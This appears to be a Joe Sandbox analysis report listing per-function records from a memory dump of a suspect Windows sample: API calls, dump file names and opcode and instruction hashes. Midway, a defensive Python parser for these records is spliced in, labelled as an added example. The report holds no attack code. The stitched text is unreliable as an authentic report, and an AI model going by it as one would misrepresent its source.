• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: BuffCharLower
• String ID:
• API String ID: 2358735015-0
• Opcode ID: 0f165a04cf20de5f905d295e1b1a6df5be67b662e4eba29e6d44638e6d99081c
• Instruction ID: 693f10a3b1177448f7e8933b351e9c29eabb6b3ddb58dd83ca8ec34ea3ac97a9
• Opcode Fuzzy Hash: 0f165a04cf20de5f905d295e1b1a6df5be67b662e4eba29e6d44638e6d99081c
• Instruction Fuzzy Hash: 8641A4B650020DAFCB11DF68C891ABEB7B8EF84314B11853EE65697291EB70DE05CB50
APIs
  • Part of subcall function 0099663E: LoadLibraryA.KERNEL32(kernel32.dll,?,?,0099668B,?,?,009962FA,?,00000001,?,?,00000000), ref: 0099664A
  • Part of subcall function 0099663E: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0099665C
  • Part of subcall function 0099663E: FreeLibrary.KERNEL32(00000000,?,?,0099668B,?,?,009962FA,?,00000001,?,?,00000000), ref: 0099666E
• LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,009962FA,?,00000001,?,?,00000000), ref: 009966AB
  • Part of subcall function 00996607: LoadLibraryA.KERNEL32(kernel32.dll,?,?,009D5657,?,?,009962FA,?,00000001,?,?,00000000), ref: 00996610
  • Part of subcall function 00996607: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00996622
  • Part of subcall function 00996607: FreeLibrary.KERNEL32(00000000,?,?,009D5657,?,?,009962FA,?,00000001,?,?,00000000), ref: 00996635
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: Library$Load$AddressFreeProc
• String ID:
• API String ID: 2632591731-0
• Opcode ID: e93a9624d04f719fdf346bd6a4fadfc022d83a0fd25ac8dfdf03b0f96c1f25bf
                                                                                                                                                                                                                                  • Instruction ID: 00dcc4e9628d65516517013da70d267277615e24e95e0cd3104ccd6603a588fa
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e93a9624d04f719fdf346bd6a4fadfc022d83a0fd25ac8dfdf03b0f96c1f25bf
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A8113A72640305ABCF10BB78CD02BAD77A59F90710F10882EF482A71C2DF75DA15DB50
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: __wsopen_s
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3347428461-0
                                                                                                                                                                                                                                  • Opcode ID: 52a9065a61734503ba2a3f2cf2fa5de316d575586260516866c342f3d85be311
                                                                                                                                                                                                                                  • Instruction ID: 11ef9690b236a6298a0a5ea385ba375559e9259b417e05707808b58705a79f28
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 52a9065a61734503ba2a3f2cf2fa5de316d575586260516866c342f3d85be311
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3511187590420AAFCF05DF98E945EDB7BF9EF48310F1140A9F809AB311DA31EA21CB65
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 009C4FF0: RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,009C319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 009C5031
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 009C53DF
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AllocateHeap_free
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 614378929-0
                                                                                                                                                                                                                                  • Opcode ID: 5c7edad85fedc96dc17405c694b3f8ca8b3e31a6960b62d958f97a24a2444c6c
                                                                                                                                                                                                                                  • Instruction ID: 1d812d334662c103788b0e47dada505bc7db1080549b0d19dc1b69f4b51fd80a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5c7edad85fedc96dc17405c694b3f8ca8b3e31a6960b62d958f97a24a2444c6c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B5012672A00344ABE3218F69D881F5AFBEDEBC5370F25091DE584832C0EA70A9458765
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
                                                                                                                                                                                                                                  • Instruction ID: 4e2fc611057a0608eb1e582c7e98f7913146149ee032dc5dcdf1dd1122f6884d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CEF02D3290161496D6313A269D05FDA375C8FC2330F104B2AF465931D1EB74E80586E3
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _wcslen
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 176396367-0
                                                                                                                                                                                                                                  • Opcode ID: 3c99a7606b1c5aacbbe454ac0f89dca07b9994c6359dc046420ef46ac288404b
                                                                                                                                                                                                                                  • Instruction ID: d280ed810db1910c5d68d2268066e3a3abc48f59a46076c60e172d870af8ae84
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3c99a7606b1c5aacbbe454ac0f89dca07b9994c6359dc046420ef46ac288404b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7BF0C8B36017046ED7149F2DDD06BA7BB98EB84770F50852AFA19CB1D1DB35E5108BA0
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 00A0F987
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: EnvironmentVariable
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1431749950-0
                                                                                                                                                                                                                                  • Opcode ID: 43e8d27b8f68554de1dfbce558ca4b0c75fdf3edcf7eab59e877933f6bf1c133
                                                                                                                                                                                                                                  • Instruction ID: 8627d044f126afd1898caca77678670ea9f66bd73349e3b581b2748ed3a9c278
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 43e8d27b8f68554de1dfbce558ca4b0c75fdf3edcf7eab59e877933f6bf1c133
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 90F03C72604204BFCB15EBA9DD4AEDF77B8EF89720F004055F505AB261DA70EE41CB61
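The per-function records above (APIs, Memory Dump Source, Joe Sandbox IDA Plugin, Similarity) are the fields an analyst pivots on when comparing this sample with others. The parser below is an added example, not part of the Joe Sandbox report or of any Joe Sandbox tooling: it turns the listing into records, strips the "Download File" link residue from the Associated entries, checks the Opcode ID / Opcode Fuzzy Hash agreement that holds for every record in this listing, and looks up functions by Instruction Fuzzy Hash against a set of hashes assumed to come from another sample's listing. Matching is an exact string comparison; Joe Sandbox's own similarity scoring is not reproduced. SAMPLE is excerpted from the listing above with the Associated lists shortened.

```python
"""Parse Joe Sandbox per-function similarity records into structured rows.
Added example; not part of the sandbox report or its tooling."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set, Tuple

# Excerpt of the listing above (Associated lists shortened to keep the sample short).
SAMPLE = """
APIs
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: __wsopen_s
• String ID:
• API String ID: 3347428461-0
• Opcode ID: 52a9065a61734503ba2a3f2cf2fa5de316d575586260516866c342f3d85be311
• Instruction ID: 11ef9690b236a6298a0a5ea385ba375559e9259b417e05707808b58705a79f28
• Opcode Fuzzy Hash: 52a9065a61734503ba2a3f2cf2fa5de316d575586260516866c342f3d85be311
• Instruction Fuzzy Hash: 3511187590420AAFCF05DF98E945EDB7BF9EF48310F1140A9F809AB311DA31EA21CB65
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
• Opcode Fuzzy Hash: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
• Instruction Fuzzy Hash: CEF02D3290161496D6313A269D05FDA375C8FC2330F104B2AF465931D1EB74E80586E3
APIs
• GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 00A0F987
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
Similarity
• API ID: EnvironmentVariable
• String ID:
• API String ID: 1431749950-0
• Opcode ID: 43e8d27b8f68554de1dfbce558ca4b0c75fdf3edcf7eab59e877933f6bf1c133
• Opcode Fuzzy Hash: 43e8d27b8f68554de1dfbce558ca4b0c75fdf3edcf7eab59e877933f6bf1c133
• Instruction Fuzzy Hash: 90F03C72604204BFCB15EBA9DD4AEDF77B8EF89720F004055F505AB261DA70EE41CB61
"""


@dataclass
class FunctionRecord:
    apis: List[str] = field(default_factory=list)        # call lines under "APIs"
    source_file: str = ""                                 # .sdmp the function was lifted from
    offset: int = 0                                       # image base of that dump
    associated: List[str] = field(default_factory=list)  # sibling dumps, link residue removed
    snapshot: str = ""                                    # IDA plugin snapshot (.jbxd)
    similarity: Dict[str, str] = field(default_factory=dict)  # Similarity block, keyed by label


def parse_records(text: str) -> List[FunctionRecord]:
    records: List[FunctionRecord] = []
    cur: Optional[FunctionRecord] = None
    in_apis = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "APIs":                # a record may open with its API list ...
            cur = FunctionRecord(); records.append(cur); in_apis = True; continue
        if line == "Memory Dump Source":  # ... or, when it lists no APIs, with the dump source
            if cur is None or cur.source_file:
                cur = FunctionRecord(); records.append(cur)
            in_apis = False; continue
        if line in ("Joe Sandbox IDA Plugin", "Similarity"):
            in_apis = False; continue
        if not line.startswith("•") or cur is None:
            continue
        body = line[1:].strip()
        if in_apis:                       # keep the call line whole, e.g. "X.KERNEL32(...), ref: ..."
            cur.apis.append(body); continue
        key, _, val = body.partition(":")
        key, val = key.strip(), val.strip()
        if key == "Source File":          # "file, Offset: hex, based on PE: true"
            file_, *rest = [p.strip() for p in val.split(",")]
            cur.source_file = file_
            for part in rest:
                k, _, v = part.partition(":")
                if k.strip() == "Offset":
                    cur.offset = int(v.strip(), 16)
        elif key == "Associated":         # drop the "Download File" link text fused onto the name
            cur.associated.append(re.sub(r"Download File$", "", val).strip())
        elif key == "Snapshot File":
            cur.snapshot = val
        else:
            cur.similarity[key] = val
    return records


def self_consistent(rec: FunctionRecord) -> bool:
    """In this listing Opcode ID always equals Opcode Fuzzy Hash; a mismatch flags a mangled record."""
    return rec.similarity.get("Opcode ID") == rec.similarity.get("Opcode Fuzzy Hash")


def shared_functions(records: List[FunctionRecord], known: Set[str]) -> List[Tuple[str, str]]:
    """(API ID, Instruction Fuzzy Hash) for functions whose hash also appears in `known`,
    assumed to be the hashes collected from another sample's listing (exact match only)."""
    return [(r.similarity.get("API ID", ""), r.similarity["Instruction Fuzzy Hash"])
            for r in records if r.similarity.get("Instruction Fuzzy Hash") in known]
```

The record boundary logic matters: a record that lists no API calls (the one with an empty API ID above) opens directly with "Memory Dump Source", while the others open with "APIs", so the parser starts a new record on "Memory Dump Source" only if the current record already has a source file. Run it over the full listing, not just SAMPLE, to build the hash set you then pass as `known` when triaging the next sample.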
APIs
• RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,009C319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 009C5031
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: AllocateHeap
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                                                                                                                  • Opcode ID: 3852f56d9bf4ee7d3a458963db4f74d2b7ee6e7128b66e374c5b82f4bc6a161b
                                                                                                                                                                                                                                  • Instruction ID: 7e48314b802800870a15689d65c138325f429b0c6e739854f5a459918a3ec772
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3852f56d9bf4ee7d3a458963db4f74d2b7ee6e7128b66e374c5b82f4bc6a161b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 45F0B436911E24A79B31DA66DC01F9A375CAF817B0F174029BC1CEB191DB64F88186E2
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,?,?,009B6A79,?,0000015D,?,?,?,?,009B85B0,000000FF,00000000,?,?), ref: 009C3BC5
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                                                                                                                  • Opcode ID: 847801bf0d2effd70ff71670f0143e28fe7cd2fbf543e5e5adb335079e43a50f
                                                                                                                                                                                                                                  • Instruction ID: 9a24d0dc2c76998ee18c03500d129d907c651c50c846f0bcb3701811c1624f93
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 847801bf0d2effd70ff71670f0143e28fe7cd2fbf543e5e5adb335079e43a50f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 19E0ED31A00A20A6FA203AB69C01FBA3A4CAF813B0F15C128FC18D65D5CB60DE0182E2
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 51ad2f9a502073f4240192216d327edc3480cff39908957ed2fecf7b9699148a
                                                                                                                                                                                                                                  • Instruction ID: c00c0483863cd93061e0ad3c410e9317b8c7c91e10341f877186a17ce2070cc9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 51ad2f9a502073f4240192216d327edc3480cff39908957ed2fecf7b9699148a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2EF03971105702CFCF349FA8D9A0866BBE8BF143293648E3EE2D686610C7359844DF10
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ClearVariant
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1473721057-0
                                                                                                                                                                                                                                  • Opcode ID: 55b4c9930a302aa97dd0bbac3a6a2a92225f6301d54b05d6fc11233522765766
                                                                                                                                                                                                                                  • Instruction ID: 7838d97b7e5e1a8ebf8ef71bafdece2f92d43c7acb48a33507b29e911b521f9e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 55b4c9930a302aa97dd0bbac3a6a2a92225f6301d54b05d6fc11233522765766
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 25F05571708240AAE7308BA9AC057B2F7E8BB60350F10892AD4C483081C7BA08C09791
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: __fread_nolock
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2638373210-0
                                                                                                                                                                                                                                  • Opcode ID: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
                                                                                                                                                                                                                                  • Instruction ID: a15bc021dcca1087f9e1742b3f51fd2d15614157efc32d60ae4b64008134d39f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8CF0F87550020DFFDF05DF94C941E9E7B79FB04358F208445F9159A251C336EA21ABA1
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • Shell_NotifyIconW.SHELL32(00000002,?), ref: 00993963
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: IconNotifyShell_
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1144537725-0
                                                                                                                                                                                                                                  • Opcode ID: a3f57b41c5a3842ec934394c79462abe09bb13de8e78e6e8e0d3710ee2978368
                                                                                                                                                                                                                                  • Instruction ID: 22d6e2b8950d7cd18876dfdc4f0bedf9170abfb0a5eabdf0664e6271fbd4e92d
• Opcode Fuzzy Hash: a3f57b41c5a3842ec934394c79462abe09bb13de8e78e6e8e0d3710ee2978368
• Instruction Fuzzy Hash: 30F037709143149FEB52DF68DC4A7D57BBCA70170CF0041A5E6449A282D7B45789CF51
APIs
• GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00993A76
  • Part of subcall function 00998577: _wcslen.LIBCMT ref: 0099858A
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
